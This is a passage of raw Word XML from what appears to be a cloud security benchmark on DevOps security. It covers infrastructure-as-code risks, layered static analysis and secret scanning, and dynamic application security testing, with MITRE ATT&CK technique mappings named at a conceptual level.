      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>) misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A370FE" w14:textId="037F4E71" w:rsidR="002D04AE" w:rsidRPr="00E53977" w:rsidRDefault="002D04AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Insecure Terraform, ARM templates, or Kubernetes manifests deploy vulnerable infrastructure with overly permissive access, missing encryption, or exposed management endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACEA601" w14:textId="457F65A7" w:rsidR="00A73663" w:rsidRPr="00E53977" w:rsidRDefault="00A73663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F19727" w14:textId="04C6C53B" w:rsidR="00A73663" w:rsidRDefault="00A73663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3A8B43" w14:textId="518CDDAD" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>exploit public-facing application (T1190) leveraging injection vulnerabilities or authentication bypasses in application code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BF18B9" w14:textId="5043C07B" w:rsidR="00A73663" w:rsidRDefault="00A73663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4728E68A" w14:textId="590E4A95" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>exploitation for client execution (T1203) exploiting client-side vulnerabilities like XSS or insecure deserialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22737943" w14:textId="394E2F99" w:rsidR="00A73663" w:rsidRDefault="00A73663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A1820D" w14:textId="368DC212" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>credentials from password stores (T1555) extracting hardcoded credentials from source code, configuration files, or compiled binaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD6D234" w14:textId="4B858433" w:rsidR="00A73663" w:rsidRDefault="00A73663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA5F0B6" w14:textId="6E4E3E0F" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>exploitation for privilege escalation (T1068) exploiting buffer overflows or memory corruption for elevated access.</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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement automated security testing with these components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A38CB" w14:textId="64BD696D" w:rsidR="00270E3C" w:rsidRPr="00E53977" w:rsidRDefault="00270E3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement multi-layered scanning strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11978B39" w14:textId="040E3955" w:rsidR="00270E3C" w:rsidRPr="00E53977" w:rsidRDefault="00270E3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Embed automated static application security testing into every </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>build</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> to detect vulnerabilities before code reaches production. Implement a multi-layered SAST strategy that combines multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Configure automatic execution with quality gates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323CCB95" w14:textId="2F61F58F" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>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output findings in standardized formats (SARIF) enabling consistent vulnerability tracking, deduplication across tools, and integration with centralized security dashboards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AD6881" w14:textId="47C42F9E" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy secret scanning with push protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2648CF01" w14:textId="26C53299" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>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patterns for proprietary authentication mechanisms. When secrets are detected, provide immediate remediation guidance including credential rotation procedures and secure alternatives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BD9665" w14:textId="4B2B42BE" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Use semantic code analysis for complex vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDF6284" w14:textId="4ECE5350" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Deploy semantic code analysis tools like GitHub </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>CodeQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t> that perform deep dataflow analysis to identify complex vulnerabilities invisible to pattern-matching scanners-such as SQL injection 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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Orchestrate with unified platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D72D0D4" w14:textId="017393EE" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unified SAST platforms like Microsoft Security DevOps Extension can orchestrate multiple specialized scanners (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>AntiMalware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">, Bandit, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>BinSkim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">, Checkov, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>ESLint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">, Template Analyzer, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>Terrascan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>Trivy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>)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105" w:name="_Toc242449568"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>DS-5: Integrate Dynamic Application Security Testing (DAST)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="3BEEE741" w14:textId="230448F4" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F64E09A" w14:textId="31D8E862" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement comprehensive dynamic security testing in pre-production environments through container security scanning for containerized workloads, automated penetration testing for web applications and Application Programming Interfaces (APIs), and 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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="502D81BB" w14:textId="6A25AF2D" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deployment configuration weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C259F5E" w14:textId="5363AD29" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Misconfigured auth providers, permissive CORS, weak TLS configurations, or missing security headers (CSP, HSTS, X-Frame-Options) enable attacks source review cannot detect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69768E29" w14:textId="0CAB3A7D" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>API security gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4067F26B" w14:textId="000D054F" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">REST and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> APIs with authentication bypasses, authorization failures, excessive data exposure, missing rate limiting, or insecure direct object references (IDOR) allow unauthorized access and data extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782D2CFC" w14:textId="20F298F7" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Authentication and authorization bypasses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33991979" w14:textId="7DB0BC7B" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Flaws in session management, password reset flows, multi-factor authentication implementation, or role-based access control logic enable privilege escalation and account takeover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBCA55F" w14:textId="69C76D08" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Session management vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D21F31" w14:textId="4EE61C48" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Environment-specific security issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69549FD5" w14:textId="4483BB43" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Integration points with databases, message queues, external APIs, or third-party services introduce runtime vulnerabilities invisible in development or isolated testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8E13CF" w14:textId="46346FC4" w:rsidR="005568A7" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Business logic flaws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E32FF" w14:textId="73F1C721" w:rsidR="00347FAF" w:rsidRPr="00E53977" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD3795B" w14:textId="252AA25F" w:rsidR="005568A7" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58360488" w14:textId="16539799" w:rsidR="00EA6627" w:rsidRPr="00E53977" w:rsidRDefault="00EA6627" w:rsidP="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>exploit public-facing application (T1190) leveraging authentication bypasses, injection flaws, or insecure API endpoints discovered through runtime testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7EEC4F" w14:textId="294EBDCF" w:rsidR="005568A7" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A5F1B4" w14:textId="1CB63834" w:rsidR="00EA6627" w:rsidRPr="00E53977" w:rsidRDefault="00EA6627" w:rsidP="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>brute force (T1110) exploiting missing rate limiting, weak password policies, or predictable session tokens detected during DAST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456664C" w14:textId="5C4B3C69" w:rsidR="005568A7" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0503B367" w14:textId="10CED5D8" w:rsidR="00EA6627" w:rsidRDefault="00EA6627" w:rsidP="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>valid accounts (T1078) abusing authorization bypasses or role manipulation vulnerabilities in deployed applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C736BF" w14:textId="77777777" w:rsidR="00EA6627" w:rsidRDefault="00EA6627" w:rsidP="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46282E7F" w14:textId="77777777" w:rsidR="00EA6627" w:rsidRPr="00E53977" w:rsidRDefault="00EA6627" w:rsidP="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457F38D9" w14:textId="5E0BA720" w:rsidR="005568A7" w:rsidRDefault="005568A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C98457C" w14:textId="249D31DF" w:rsidR="00EA6627" w:rsidRPr="00E53977" w:rsidRDefault="00EA6627" w:rsidP="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>data from information repositories (T1213) extracting sensitive data through excessive API responses, directory traversal, or insecure direct object reference vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702D0CE5" w14:textId="7DA4E901" w:rsidR="000E5A9F" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457AE34A" w14:textId="0C60CE15" w:rsidR="00EA6627" w:rsidRPr="00E53977" w:rsidRDefault="00EA6627" w:rsidP="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>exfiltration over web service (T1567) exploiting API security gaps to extract data at scale without detection.</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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement runtime security validation through these capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664D1155" w14:textId="1CFE87CB" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Complement SAST with runtime validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F7819" w14:textId="2E98E441" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>policies, missing security headers), environment-specific integration flaws (database connection security, API authorization in deployed contexts), and business logic vulnerabilities that only manifest under realistic operating conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FB42A8" w14:textId="67D08CD4" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy in production-like staging environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCAE8E0" w14:textId="767DBB2B" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>validates</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> that security controls function correctly when integrated with production-like external systems (identity providers, databases, message queues, third-party APIs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FB442A" w14:textId="574552B5" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement runtime monitoring for containers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F9C6F" w14:textId="16BED954" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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Kubernetes workload behavior to detect deviations indicating </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>compromise, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> continuously assess container configurations against CIS benchmarks and security best practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26925238" w14:textId="65214A66" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Focus on high-risk attack surfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532A0C00" w14:textId="6AED1B84" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
